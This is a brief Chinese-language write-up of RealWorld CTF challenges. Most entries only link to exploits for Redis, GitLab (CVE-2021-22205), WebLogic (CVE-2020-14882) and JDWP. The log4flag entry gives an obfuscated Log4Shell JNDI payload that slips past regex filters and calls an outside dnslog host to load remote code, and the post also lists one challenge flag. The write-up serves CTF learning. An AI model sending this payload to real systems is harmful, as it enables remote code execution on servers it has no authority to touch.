标签:Hacker Database Writeup blog RealWorld CTF https com Refer
文章目录
- Digital Souvenir
- log4flag
- Be-a-Database-Hacker
- the Secrets of Memory
- baby flaglab
- Flag Console
- Be-a-Database-Hacker 2
- Java Remote Debugger
Digital Souvenir
rwctf{RealWorldIsAwesome}
log4flag
有一些正则过滤
网上bypass方法很多,随便找一个就行
${${::-j}ndi:${lower:rmi}://vw3nwn.dnslog.cn/exp}
Refer:https://cloud.tencent.com/developer/article/1921530
Be-a-Database-Hacker
redis
未授权访问
Refer: https://github.com/n0b0dyCN/redis-rogue-server
the Secrets of Memory
Refer:https://landgrey.me/blog/16/
baby flaglab
Refer:https://github.com/Al1ex/CVE-2021-22205
Flag Console
Refer:https://github.com/backlion/CVE-2020-14882_ALL
Be-a-Database-Hacker 2
Refer:https://blog.csdn.net/qq_36869808/article/details/122426922
Java Remote Debugger
Test.java
import java.lang.Thread;
public class Test {
public static void main (String[] args) throws Exception{
int i = 0;
while (1 == 1) {
Thread.sleep(1000);
System.out.println("" + i);
i += 1;
}
}
}
Java Debug Wire Protocol (JDWP) - Remote Code Execution
Refer:https://security.tencent.com/index.php/blog/msg/137
标签:Hacker,Database,Writeup,blog,RealWorld,CTF,https,com,Refer 来源: https://blog.csdn.net/mochu7777777/article/details/122645259
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。